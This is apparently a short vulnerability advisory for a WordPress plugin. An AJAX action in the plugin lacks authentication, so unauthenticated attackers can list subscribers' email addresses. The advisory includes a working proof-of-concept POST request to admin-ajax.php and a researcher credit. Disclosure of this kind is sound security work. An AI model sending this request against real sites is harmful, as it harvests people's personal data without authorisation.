The plugin does not have any authentication and authorisation in an AJAX action, allowing unauthenticated attackers to call it and get the email addresses of subscribed users
POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Length: 104 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close page=subscribe&action=getListForTbl&reqType=ajax&search[text_like]=&_search=false&pl=pps&sidx=id&rows=10
Felipe de Avila
Felipe de Avila
Yes
2022-04-18 (about 3 months ago)
2022-04-18 (about 3 months ago)
2022-04-19 (about 3 months ago)